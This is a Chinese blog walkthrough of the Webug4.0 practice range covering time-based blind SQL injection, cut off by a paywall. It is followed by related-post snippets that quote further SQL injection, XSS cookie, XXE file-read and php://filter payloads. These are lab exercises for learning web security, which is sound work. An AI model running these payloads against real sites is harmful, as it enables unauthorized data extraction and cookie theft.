Webug4.0靶场通关笔记(第二天)--------延时注入和post注入

最新推荐文章于 2024-06-21 11:12:50 发布
最新推荐文章于 2024-06-21 11:12:50 发布
阅读量813 收藏 2
点赞数 1
分类专栏: webug靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxt2804567059/article/details/113875794
版权
本文详细介绍了SQL注入中的延时注入和POST注入技术。通过实例演示了如何利用延时注入判断数据库信息、表名及列名,并获取数据。同时提到了POST注入,指出其与URL注入的相似性。
摘要由CSDN通过智能技术生成

一、延时注入

延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应,当布尔注入不成功时,即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入。

这个也可以用布尔注入,不过既然考察延时注入,还是学习下比较好
1.先判断字段数
在这里插入图片描述2.判断数据库(webug)

?id=1’ and if(substr(database(),1,1)=‘w’,sleep(5),1)%23 (判断数据库第一个字母是否为w,是的沉睡5秒)
?id=1’ and if(substr(database(),2,1)=‘w’,sleep(5),1)%23 (判断数据库第二个字母是否为w,很明显不是)

在这里插入图片描述

最终判断出数据库为webug

3.爆出webug数据库中所有表

?id=1’ and if((select count(table_name) from information_schema.tables where table_schema=database())>6,sleep(5),1)%23
?id=1’ and if((select count(table_name) from i

最低0.47元/天 解锁文章
{Yasso}
关注
专栏目录
Webug4.0靶场通关笔记(第八天)--------22-26
Yasso的博客
02-26 541
一、越权修改密码 二、支付漏洞 三、邮箱轰炸 四、越权查看admin 五、URL跳转 一、越权修改密码 二、支付漏洞 三、邮箱轰炸 四、越权查看admin 五、URL跳转
Webug4.0靶场通关
天行健,君子以自强不息
02-05 3288
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
POST方式时间注入
最新发布
2401_84445424的博客
06-21 1225
POST 方式时间注入是一种 SQL 注入攻击方法,它利用了 Web 应用程序中对 POST 请求参数处理不当的漏洞。在这种攻击中,攻击者会构造特定的 POST 请求,其中包含恶意的时间相关数据,以达到绕过验证、执行非法操作或获取敏感信息的目的。
webug4.0-延时注入
nex1less的博客
08-26 958
延时注入介绍:对于基于时间的盲注,通过构造真or假判断条件的sql语句,且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求,观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。 0x01 Mysql数据相关知识 ...
webug4.0—延时注入
Stephen Wolf
01-09 314
延时注入介绍:对于基于时间的盲注,通过构造真or假判断条件的sql语句,且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求,观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。 探测sql注入 一、正常页面 1.加...
webug4.0-post注入
nex1less的博客
08-27 1149
0x01 漏洞发现 1.首先在 http://192.168.72.136/control/sqlinject/post_injection.php 页面中输入 1,发现url没有变化,我们初步猜测可能是请求类可能是post。火狐浏览器按f12 查看,或者右键审查元素 也可以,点击左上角方框,然后移动到输入框,发现果然是post。...
Webug4.0靶场通关笔记(第九天)--------完结篇
Yasso的博客
02-27 1113
一、文件包含漏洞 二、命令执行 三、webshell爆破 四、ssrf 明天就开学了~~唉,剩下的就都打完算了!!! 一、文件包含漏洞 文件包含漏洞在ctf上种类有很多,我接触过的有php伪协议、日志包含、目录遍历、session文件包含等等。全阐述的话我是讲不完(主要还是菜),就拿这webug4.0的靶场当例子吧. 打开靶场注意url栏(文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码(index.php),这里用的是base64读取) ?filename=php://fi
Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入
Yasso的博客
02-22 839
一、xxe注入 这道题应该是最简单的任意文件读取 打开是一个输入框 在C盘构造一个flag,别问我为啥,我也不知道。。。 bp抓个包 随便输入个什么都有回显,应该是基础的XXE注入 这是一段读取文件的xml<?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY B SYSTEM "file:///c:/1.txt"> ]> <xml> <xxe>&B;</xxe&g...
Webug4.0靶场通关笔记(第三天)--------过滤注入和宽字节注入
Yasso的博客
02-21 754
一、过滤注入 这一关为过滤注入,我以为过滤了空格,百度说过滤了select,单独输select会报错。。。。。。。 那这就跟第四关POST注入一样,还是搞吧,POST省略了,这个不能省了。。。。。 1.是否报错 加个单引号会报错 2.既然有报错,先判断列数 可以看出有两列,尝试报错注入 union select 1,database()# -------------但页面没有回显,所以不能用显错注入 再次尝试 and 1=1# 和 and 1=2# -----但无论对错,都没有回显 所
Webug4.0靶场通关笔记(第一天)--------显错注入和布尔注入
Yasso的博客
02-20 1066
一、显错注入 打开靶场试试尝试修改为id=2,回显hello。 1、首先判断注入点 插播一条,php版本必须为5.3.29,不然不会报错!!!!!!!!!!!!!!!! 尝试加单引号,会报错, (%23不能在hackbar上输入,否则会一直报错,我们来测试下在hackbar上输的%23到url上变成了%2523,很明显这是#的二次url编码)还是不用hackbar了,也可能是我的hackbar有问题。 ?id=1’ 页面报错 ?id=1’ or 1=1%23 页面显示正常 (这里#貌似被过
webug--post注入
gclome的博客
06-03 1043
今天来到了post注入 首先我们要明确两个问题 什么是post注入 post注入是通过对输入框进行传参,可以被带入数据库进行的查询 什么条件下可以进行post注入 1.用户可以控制传参; 2.用户输入的语句被带入数据库进行查询。 ok,开始今天的练习题: 访问靶场: 这次页面和前几关不同,明显可见有输入框。 寻找注入点 在输入框尝试1234,英文都没有反应 这时候我们猜测是不是搜索到了结果但是不显示,这样的话就需要特殊字符来让页面产生变化,比如报错页面之类的 输入1’,报错了,找到了注入点 找到注入点后尝试
webug 4.0 第四关 POST注入
ONS_cukuyo的博客
04-19 2227
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.webug.org...
Webug4.0靶场过关--注入
BGiscool的博客
11-01 1337
webug靶场过关秘籍
webug4.0—post注入
Stephen Wolf
01-10 576
post注入是通过对输入框进行传参,可以被带入数据库进行的查询 注入的两个条件: 1.用户可以控制传参; 2.用户输入的语句被带入数据库进行查询。 一、开始注入 首先输入其他,如1,2,3、英文等页面都无变化 这时候我们猜测是不是搜索到了结果但是不显示,这样的话就需要特殊字符来让页面产生变化,比如报错页面之类的 搜索输入右括号) 页面无变化 搜索输入双引号" 页面无变化 搜索输入...
webug靶场注入
weixin_45705209的博客
08-26 849
注入 显错注入 单引号报错,构造闭合,payload' and 1=1--+与 ' and 1=2,页面返回的信息不一致,由此还可以判断出存在注入,用order by查出字段数为二,union 联合查询找到回显点位置,带入select语句查询。 查询所有的库名payload:-1' union select 1,group_concat(schema_name) from information_schema.schemata --+,这里查出来的库有一些我在本地搭建环境中其他的库,其中informatio
webug--延时注入
gclome的博客
05-13 1052
延时注入介绍 对于基于时间的盲注,通过构造真or假判断条件的sql语句,且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求,观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。 延时注入我们一般不能从页面直接获取数据库信息,所用知识与第二关基本相同 if(exp,1,sleep(5))如果exp为真,返回1,否则返回sleep(5
webug 4.0 第三关 延迟注入
ONS_cukuyo的博客
02-28 1886
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.web...
webug4.0靶场通关之XSS
0nc3的博客
06-24 788
0x00 反射XSS 以进入页面就寻找搜索框,发现有个放大镜点着没有反应 但改URL中的id进行搜索 Payload: <script>(document.cookie)</script> 0x01 存储XSS 下拉置底部留言板处 提交xss一句话留言 Payload: 0x02 DomXSS 看到搜索框,F12查看元素 搜索框的输入是给value参数传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

{Yasso}

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值